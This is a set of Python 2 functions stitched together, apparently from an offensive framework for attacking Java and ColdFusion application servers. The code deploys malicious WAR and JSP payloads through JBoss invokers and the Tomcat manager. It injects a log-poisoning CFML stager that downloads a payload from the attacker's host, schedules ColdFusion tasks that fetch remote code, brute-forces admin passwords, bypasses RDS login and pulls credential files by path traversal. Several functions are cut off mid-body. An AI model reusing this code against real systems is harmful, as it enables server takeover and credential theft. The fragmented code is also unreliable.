def deploy(fingerengine, fingerprint):
""" This module exploits the BSHDeployer in an exposed JBoss web-console.
It essentially invokes /web-console/Invoker to download and deploy a BSH,
which can be used as a stager for our WAR payload.
"""
war_file = path.abspath(fingerengine.options.deploy)
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/web-console/Invoker".format(fingerengine.options.ip,
fingerprint.port)
if not rewriteBsh(war_file, fingerengine.options.remote_os):
utility.Msg("Failed to write WAR to BSH", LOG.ERROR)
return
# poll the URL to check for 401
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg(
"Host %s:%s requires auth for web-console, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
(usr, pswd) = (cookies[1].username, cookies[1].password)
response = bsh_deploy(fingerengine.options.remote_os, url,
fingerprint.version.split('.')[0], usr, pswd)
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
else:
# run our java lib for the serialized request
response = bsh_deploy(fingerengine.options.remote_os, url,
fingerprint.version.split('.')[0])
# remove the copied bsh
system("rm ./src/lib/jboss/bsh_deploy/bshdeploy.bsh")
if response:
if type(response) is str and response != '':
utility.Msg(response, LOG.DEBUG)
elif response.returncode > 0:
utility.Msg(
"Failed to deploy to %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
utility.Msg(response.output, LOG.DEBUG)
return
utility.Msg(
"{0} deployed to {1}".format(war_file, fingerengine.options.ip),
LOG.SUCCESS)
def deploy(fingerengine, fingerprint):
""" Exploits log poisoning to inject CFML stager code that pulls
down our payload and stashes it in web root
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
base = 'http://{0}:{1}/'.format(dip, fingerprint.port)
stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
" path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\
" file='{1}'>"
# ensure we're deploying a valid filetype
extension = cfm_file.rsplit('.', 1)[1]
if extension.lower() not in ['jsp', 'cfml']:
utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR)
return
# start up our local server to catch the request
server_thread = Thread(target=_serve, args=(cfm_path, ))
server_thread.start()
# inject stager
utility.Msg("Injecting stager...")
b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(),
state.external_port,
cfm_file))
stager = quote_plus(stager.format(b64addr, cfm_file))
stager += ".cfml" # trigger the error for log injection
_ = utility.requests_get(base + stager)
# stager injected, now load the log file via LFI
if fingerprint.version in ["9.0", "10.0"]:
LinvokeLFI(base, fingerengine, fingerprint)
else:
invokeLFI(base, fingerengine, fingerprint)
if waitServe(server_thread):
utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy file.", LOG.ERROR)
killServe()
def run(self, fingerengine, fingerprint):
""" Obtains remote Coldfusion information from the reports index page.
This pulls the first 26 entries from this report, as there's lots of
extraneous stuff. Perhaps if requested I'll prompt to extend to the
remainder of the settings.
"""
utility.Msg("Attempting to retrieve Coldfusion info...")
base = "http://{0}:{1}".format(fingerengine.options.ip,
fingerprint.port)
uri = "/CFIDE/administrator/reports/index.cfm"
try:
response = utility.requests_get(base + uri)
except Exception, e:
utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
return
def _auth(usr, pswd, url):
"""
"""
res = utility.requests_get(url, auth=HTTPBasicAuth(usr, pswd))
if res.status_code == 200:
utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd),
LOG.DEBUG)
return (dict_from_cookiejar(res.cookies), HTTPBasicAuth(usr, pswd))
def run(self, fingerengine, fingerprint):
""" Simple fetch
"""
utility.Msg("Fetching credentials...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
uri = '/conf/users/admin-users.xml'
response = utility.requests_get(base + uri)
if response.status_code is 200:
un = findall("name=\"(.*?)\"", response.content)
pw = findall("password=\"(.*?)\"", response.content)
if len(pw) > 0 and len(un) > 0:
utility.Msg("Found credentials:")
for (u, p) in zip(un, pw):
utility.Msg("\t%s:%s" % (u, p), LOG.SUCCESS)
def _auth(usr, pswd, url):
""" Authentication is trivially obtained via the admin REST interface
"""
res = utility.requests_get(url, auth=HTTPBasicAuth(usr, pswd))
if res.status_code == 200:
utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd),
LOG.DEBUG)
return HTTPBasicAuth(usr, pswd)
def deploy(fingerengine, fingerprint):
""" This deployer is slightly different than manager_deploy in
that it only requires the manager-gui role. This requires us
to deploy like one would via the web interface.
"""
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/manager/html/upload'
war_file = fingerengine.options.deploy
war_path = parse_war_path(war_file)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if not cookies:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(war_file))
if fingerprint.version in ['6.0', '7.0', '8.0']:
# deploying via the gui requires a CSRF token
(csrf, c) = fetchCSRF(base, cookies)
if not csrf:
return
else:
# set CSRF and refresh session id
uri += '?org.apache.catalina.filters.CSRF_NONCE={0}'
uri = uri.format(csrf)
cookies = (c, cookies[1])
# read in payload
try:
tag = 'deployWar'
if fingerprint.version in ['4.0', '4.1']:
tag = 'installWar'
files = {tag: (war_path + '.war', open(war_file, 'rb'))}
except Exception as e:
utility.Msg(e, LOG.ERROR)
return
# deploy
response = utility.requests_post(base + uri,
files=files,
cookies=cookies[0],
auth=cookies[1])
if response.status_code == 200 and "OK" in response.content:
utility.Msg("Deployed {0} to /{1}".format(war_file, war_path),
LOG.SUCCESS)
elif 'Application already exists' in response.content:
utility.Msg("Application {0} is already deployed".format(war_file),
LOG.ERROR)
elif response.status_code is 403:
utility.Msg("This account does not have permissions to remotely deploy. Try"\
" using manager_deploy", LOG.ERROR)
else:
utility.Msg("Failed to deploy (HTTP %d)" % response.status_code,
LOG.ERROR)
def checkAuth(ip, port, title):
""" Railo doesn't have usernames, so we only care about passwords
"""
url = None
if title is RINTERFACES.WEB:
url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
elif title is RINTERFACES.SRV:
url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
if state.usr_auth:
# check with given auth; handle both cases of "default" and ":default"
if ':' in state.usr_auth:
(_, pswd) = state.usr_auth.split(":")
else:
pswd = state.usr_auth
return _auth(pswd, url, title)
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
cook = _auth(word, url, title)
if cook:
print ''
utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def _run5(self, fingerengine, fingerprint):
""" Pull sys info from older CF instances; it is quite ugly
"""
utility.Msg("Attempting to retrieve Coldfusion info...")
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)[0]
if not cookies:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/server_settings/version.cfm'
elif fingerprint.version in ['6.0', '6.1']:
uri = '/CFIDE/administrator/settings/version.cfm'
response = utility.requests_get(base+uri, cookies=cookies)
if fingerprint.version in ['5.0']:
keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", response.content.translate(None, '\r\n'))[1:]
values = findall("<td>(.*?)</td>", response.content.translate(None, '\r\n'))
for (key, value) in zip(keys, values[2:]):
k = findall("class=\"text2\">(.*?)</p>", key)[0].replace(" ",'').rstrip()
v = findall(">(.*?)\t", value)[0].replace(' ','')
utility.Msg(" %s: %s" % (k, v))
elif fingerprint.version in ['6.0', '6.1']:
keys = findall("<td height=\"18\" nowrap>(.*?)</td>",
response.content.translate(None, '\r\n'))
values = findall("<td width=\"100%\" class=\"color-row\">(.*?)</td>",
response.content.translate(None, '\r\n'))
for (key, value) in zip(keys[:-2], values[:-2]):
k = findall(" (.*?) ", key)[0].lstrip().rstrip()
v = findall(" (.*?)\t", value)[0].lstrip().rstrip()
utility.Msg(" %s: %s" % (k, v))
def undeploy(fingerengine, fingerprint):
""" Undeploying is quite simple via the exposed REST API
"""
if fingerprint.version in ['3.1', '4.0']:
state.ssl = True
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
context = parse_war_path(fingerengine.options.undeploy)
cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
headers = {
"Accept" : "application/json",
"X-Requested-By" : "requests"
}
if not cookie:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
utility.Msg("Preparing to undeploy %s..." % context)
uri = '/management/domain/applications/application/%s' % context
if fingerprint.version in ['3.0']:
# GF 3.0 doesnt appear to support the DELETE verb
data = {
"operation" : "__deleteoperation"
}
response = utility.requests_post(base + uri, auth=cookie,
headers=headers,
data=data)
else:
response = utility.requests_delete(base + uri, auth=cookie,
headers=headers)
if response.status_code is 200:
utility.Msg("'%s' undeployed successfully" % context, LOG.SUCCESS)
else:
utility.Msg("Failed to undeploy %s: %s" % (context, response.content),
LOG.ERROR)
def auxengine(fingerengine):
""" Our core auxiliary engine runs as such:
1. While building the command parser, we load all modules and append their
CLI flags to a hidden argument parser.
2. After fingerprinting the remote service, we load all of the platform's
modules and run check(); this will return True/False as to whether or
not it applies to the fingerprint.
3. If the fingerprint applies, we check for --fingerprint, which will
simply list that it is acceptable. We also check for the auxiliarys
hidden flag and, if it exists, we run the auxiliary.
"""
fpath = [abspath("./src/platform/%s/auxiliary" % fingerengine.service)]
modules = list(pkgutil.iter_modules(fpath))
found = []
for fingerprint in fingerengine.fingerprints:
for auxiliary in modules:
mod = auxiliary[0].find_module(auxiliary[1]).load_module(
auxiliary[1])
try:
mod = mod.Auxiliary()
except:
# logged in build_platform_flags
continue
if mod.name not in found and mod.check(fingerprint):
if fingerengine.options.fp:
utility.Msg(
"Vulnerable to %s (--%s)" % (mod.name, mod.flag),
LOG.SUCCESS)
elif vars(fingerengine.options)[mod.flag]:
try:
mod.run(fingerengine, fingerprint)
except Exception, e:
utility.Msg("Error with module: %s" % e, LOG.ERROR)
found.append(mod.name)
def check(self, ip, port = None):
"""
"""
try:
rport = self.port if port is None else port
url = "http://{0}:{1}/resource/xx.cs".format(ip, rport)
main_url = "http://{0}:{1}{2}".format(ip, rport, self.uri)
response = utility.requests_get(url)
if response.status_code == 404:
data = findall("Edition|Server (.*?) *</h3>", response.content)
if len(data) > 0 and self.version in data[0]:
#
# The admin interface can be remotely exposed, but not accessible; lets
# check for that
#
main_r = utility.requests_post(main_url,
data={"j_username":"******",
"j_password":"",
"loginButton.DisabledHiddenField":"true"
}
)
if 'Secure Admin must be enabled' in main_r.content:
utility.Msg("Admin interface version %s discovered, but"
" not remotely accessible." % self.version,
LOG.UPDATE)
return False
return True
except exceptions.Timeout:
utility.Msg("{0} timeout to {1}:{2}".format(self.platform,
ip, rport),
LOG.DEBUG)
except exceptions.ConnectionError:
utility.Msg("{0} connection error to {1}:{2}".format(self.platform,
ip, rport),
LOG.DEBUG)
return False
def run(self, fingerengine, fingerprint):
""" Obtain a list of deployed WARs on a remote Tomcat instance
"""
utility.Msg("Obtaining deployed applications...")
base = "http://{0}:{1}".format(fingerengine.options.ip,
fingerprint.port)
relative = '/manager/list'
if fingerprint.version in ["7.0", "8.0"]:
relative = '/manager/text/list'
url = base + relative
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg(
'Host %s:%s requires auth, checking...' %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(url,
cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
apps = response.content.split('\n')[1:-1]
for app in apps:
utility.Msg("App found: %s" % app.split(':', 1)[0])
else:
utility.Msg(
"Unable to retrieve %s (HTTP %d)" %
(url, response.status_code), LOG.DEBUG)
def undeploy(fingerengine, fingerprint):
""" Undeploy a deployed application from the remote WL server
"""
app = fingerengine.options.undeploy
# ensure it ends with war
app = app if '.war' in app else app + '.war'
base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
if fingerprint.title is WINTERFACES.WLS:
base = base.replace("http", "https")
uri = "/console/console.portal?AppApplicationUninstallPortletreturnTo="\
"AppAppApp&AppDeploymentsControlPortlethandler="\
"com.bea.console.handles.JMXHandle(\"com.bea:Name=mydomain,Type=Domain\")"
data = { "all" : "on",
"AppApplicationUninstallPortletchosenContents" :
"com.bea.console.handles.AppDeploymentHandle%28%22com.bea"\
"%3AName%3D{0}%2CType%3DAppDeployment%22%29".format(app),
"_pageLabel" : "AppApplicationUninstallPage",
"_nfpb" : "true",
"AppApplicationUninstallPortletfrsc" : None
}
utility.Msg("Host %s:%s requires auth, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint, True)
if cookies[0]:
data['AppApplicationUninstallPortletfrsc'] = fetchCSRF(base, cookies[0])
try:
utility.requests_post(base + uri, data=data, cookies=cookies[0], timeout=1.0)
except exceptions.Timeout:
utility.Msg("{0} undeployed.".format(app), LOG.SUCCESS)
else:
utility.Msg("Failed to undeploy {0}".format(app), LOG.ERROR)
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
def make_request(method,
host,
port,
ssl,
url,
data,
cookies=None,
allow_redirects=True):
response = None
if port == None and ssl:
port = 443
if port == None and not ssl:
port = 80
try:
url = "{0}://{1}:{2}{3}".format("https" if ssl else "http", host, port,
url)
if method == 'GET':
response = utility.requests_get(url, cookies=cookies)
elif method == 'BASIC':
response = utility.requests_get(url,
cookies=cookies,
auth=(data['username'],
data['password']))
elif method == 'POST':
response = utility.requests_post(url,
data,
cookies=cookies,
allow_redirects=allow_redirects)
elif method == 'HEAD':
response = utility.requests_head(url, cookies=cookies)
elif method == 'PUT':
response = utility.requests_put(url, data, cookies=cookies)
else:
response = utility.requests_other(method, url, cookies=cookies)
return response
except exceptions.Timeout:
utility.Msg("Timeout to {0}:{1}".format(host, port), 'DEBUG')
except exceptions.ConnectionError, e:
utility.Msg("Connection error to {0} ({1})".format(host, port, e),
'DEBUG')
def invoke_axis2(fingerengine, fingerprint, deployer):
""" Invoke an Axis2 payload
"""
dfile = parse_war_path(fingerengine.options.deploy)
url = 'http://{0}:{1}/axis2/services/{2}'.format(fingerengine.options.ip,
fingerprint.port, dfile)
if fingerprint.version not in ['1.6']:
# versions < 1.6 require an explicit invocation of run
url += '/run'
utility.Msg("Attempting to invoke...")
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile,
fingerengine.options.ip))
return
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def parseGnmap(inFile, httpOnly, useNmapSSL):
if (detectFileType(inFile) == 'gnmap'):
targets = []
for hostLine in inFile:
#Pull out the IP address (or hostnames) and HTTP service ports
fields = hostLine.split(' ')
ip = fields[
1] #not going to regex match this with ip address b/c could be a hostname
for item in fields:
if (httpOnly):
#Make sure we have an open port with an http type service on it
if item.find('http') != -1 and re.findall(
'\d+/open', item):
port = None
https = False
'''
nmap has a bunch of ways to list HTTP like services, for example:
8089/open/tcp//ssl|http
8000/closed/tcp//http-alt///
8008/closed/tcp//http///
8080/closed/tcp//http-proxy//
443/open/tcp//ssl|https?///
8089/open/tcp//ssl|http
Since we want to detect them all, let's just match on the word http
and make special cases for things containing https and ssl when we
construct the URLs.
'''
port = item.split('/')[0]
if item.find('https') != -1 or item.find('ssl') != -1:
https = True
#Add the current service item to the currentTarget list for this host
if (useNmapSSL):
targets.append(ip + ":" + port + ":" + str(https))
else:
targets.append(ip + ":" + port)
else:
if item.find('tcp') != -1 and re.findall('\d+/open', item):
port = None
ssl = False
port = item.split('/')[0]
if item.find('https') != -1 or item.find('ssl') != -1:
ssl = True
#Add the current service item to the currentTarget list for this host
if (useNmapSSL):
targets.append(ip + ":" + port + ":" + str(ssl))
else:
targets.append(ip + ":" + port)
return targets
else:
utility.Msg('Nmap file is not of type gnmap', 'ERROR')
return []
def invkdeploy(version, url, local_url):
"""
"""
res = None
try:
res = check_output(["./invkdeploy.sh", version, url, local_url],
cwd="./src/lib/jboss/jmxinvoke_deploy")
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = e
def create_task(ip, fingerprint, cfm_file, root):
""" Create the task
"""
url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\
format(ip, fingerprint.port)
(cookie, csrf) = fetch_csrf(ip, fingerprint, url)
data = {
"TaskName":
cfm_file,
"Start_Date":
"Jan 27, 2014", # shouldnt matter since we force run
"ScheduleType":
"Once",
"StartTimeOnce":
"9:56 PM", # see above
"Operation":
"HTTPRequest",
"ScheduledURL":
"http://{0}:{1}/{2}".format(state.external_port,
utility.local_address(), cfm_file),
"publish":
"1",
"publish_file":
root + "\\" + cfm_file, # slash on OS?
"adminsubmit":
"Submit"
}
# version-specific settings
if fingerprint.version in ["9.0", "10.0", '11.0']:
data['csrftoken'] = csrf
if fingerprint.version in ["10.0", '11.0']:
data['publish_overwrite'] = 'on'
if fingerprint.version in ["7.0", "8.0"]:
data['taskNameOrig'] = ""
response = utility.requests_get(url, cookies=cookie)
if response.status_code is 200:
# create task
response = utility.requests_post(
url,
data=data,
cookies=cookie,
headers={'Content-Type': 'application/x-www-form-urlencoded'})
if response.status_code is 200:
return True
else:
utility.Msg("Failed to deploy (HTTP %d)" % response.status_code,
LOG.ERROR)
def undeploy(fingerengine, fingerprint):
"""
"""
if fingerprint.title is JINTERFACES.JMX:
return jmx_undeploy(fingerengine, fingerprint)
elif fingerprint.title is JINTERFACES.MM:
return manage_undeploy(fingerengine, fingerprint)
else:
utility.Msg("JBoss interfaces %s does not yet support undeploying" %\
fingerprint.title, LOG.ERROR)
def _auth(usr, pswd, url, version):
""" Currently only auths to the admin interface
"""
data = {"userName": usr, "password": pswd, "submit": "+Login+"}
response = utility.requests_post(url, data=data)
if response.status_code is 200 and not "name=\"password\"" in response.content:
utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd),
LOG.DEBUG)
return dict_from_cookiejar(response.cookies)
def invoke_war(fingerengine, fingerprint):
""" Invoke a deployed WAR or JSP file on the remote server.
This uses unzip because Python's zip module isn't very portable or
fault tolerant; i.e. it fails to parse msfpayload-generated WARs, though
this is a fault of metasploit, not the Python module.
"""
dfile = fingerengine.options.deploy
jsp = ''
if '.war' in dfile:
jsp = getoutput("unzip -l %s | grep jsp" % dfile).split(' ')[-1]
elif '.jsp' in dfile:
jsp = parse_war_path(dfile, True)
if jsp == '':
utility.Msg("Failed to find a JSP in the deployed WAR", LOG.DEBUG)
return
utility.Msg("Using JSP {0} from {1} to invoke".format(jsp, dfile),
LOG.DEBUG)
war_path = parse_war_path(dfile)
try:
# for jboss ejb/jmx invokers, we append a random integer
# in case multiple deploys of the same name are used
if fingerengine.random_int:
war_path += fingerengine.random_int
except:
pass
url = "http://{0}:{1}/{2}/{3}".format(fingerengine.options.ip,
fingerprint.port, war_path, jsp)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(war_path,
fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(parse_war_path(dfile, True)),
LOG.ERROR)
def run(self, fingerengine, fingerprint):
utility.Msg("Checking RDS...")
base = "http://{0}:{1}".format(fingerengine.options.ip,
fingerengine.options.port)
url = base + "/CFIDE/adminapi/administrator.cfc?method=login"
payload = {'adminpassword': '', 'rdsPasswordAllowed': 1}
rval = utility.requests_post(url, payload)
if rval.status_code is 200:
rval = rval.content
if "true" in rval:
rval = utility.requests_get(base +
"/CFIDE/administrator/index.cfm")
if rval.status_code is 200:
utility.Msg("Login bypass successful.", LOG.SUCCESS)
else:
utility.Msg("System not vulnerable.", LOG.ERROR)
def bsh_deploy(arch, url, version, usr = None, pswd = None):
""" Invoke the BSHDeployer
"""
res = None
try:
res = check_output(["./bshdeploy.sh", url, arch, version,
str(usr), str(pswd)],
cwd="./src/lib/jboss/bsh_deploy")
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = e
def check_service(self, service):
""" Given a service, this will initiate our fingerprinting engine against
the remote host and return a list of all matched fingerprints. Successful
fingerprints will also be dumped to console.
"""
utility.Msg("Loading fingerprint engine '%s'" % service, LOG.DEBUG)
matched_fingerprints = self.definitions(self.options.ip,
self.options.port, service)
if len(matched_fingerprints) > 0:
utility.Msg("Matched %d fingerprints for service %s" %
(len(matched_fingerprints), service))
for fp in matched_fingerprints:
utility.Msg("\t%s (version %s)" % (fp.title, fp.version),
LOG.SUCCESS)
else:
utility.Msg("No fingerprints found for service %s" % service)
return matched_fingerprints
def _getPath(self, version):
""" Return the traversal path based on the version. I haven't figured out
how to traverse just yet in 3.0/4.0.2, but it should be possible.
"""
if version in ["3.0", "4.0"]:
utility.Msg("Version %s is not vulnerable to credential retrieval"
", but is vulnerable to path disclosure" % version,
LOG.UPDATE)
return ".\\\..\\\client\\\\auth.conf"
elif version in ["3.2"]:
return "jmx-console-users.properties"
def worker(checkQueue, tout):
while True:
#Try to a check from the queue
try:
curCheck = checkQueue.get(timeout=tout)
utility.Msg(str(checkQueue.qsize()) + ' checks remaining', 'DEBUG')
check = curCheck[0]
host_port_ssl = curCheck[1]
check_status = False
if (len(host_port_ssl) > 1):
check_status = check.check(host_port_ssl[0], host_port_ssl[1],
host_port_ssl[2])
check.print_message(check_status, host_port_ssl[0],
host_port_ssl[1])
else:
check_status = check.check(host_port_ssl[0])
check.print_message(check_status, host_port_ssl[0])
except Queue.Empty:
utility.Msg('Check queue is empty, worker quitting.', 'DEBUG')
return
def wc_invoke(url, local_url, usr = None, pswd = None):
""" Invoke the webconsole deployer
"""
res = None
try:
res = check_output(["./webc_deploy.sh", url, local_url, str(usr),
str(pswd)],
cwd="./src/lib/jboss/webconsole_deploy")
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = e
def _invoke(url):
""" Make the request
"""
status = False
try:
response = utility.requests_get(url)
if response.status_code == 200:
status = True
except Exception, e:
utility.Msg("Failed to invoke payload: %s" % e, LOG.ERROR)
status = False
def run(fingerengine):
""" Undeploying is much simpler than deploying; we have a single undeploy
file that supports a list of interfaces.
"""
try:
undeployer = import_module("src.platform.%s.undeployer" %
fingerengine.service)
except:
utility.Msg(
"No undeployer found for platform %s" % fingerengine.service,
LOG.ERROR)
return
for fingerprint in fingerengine.fingerprints:
if fingerprint.title in undeployer.titles:
undeployer.undeploy(fingerengine, fingerprint)
return
utility.Msg("No valid fingerprints were found to undeploy.", LOG.ERROR)
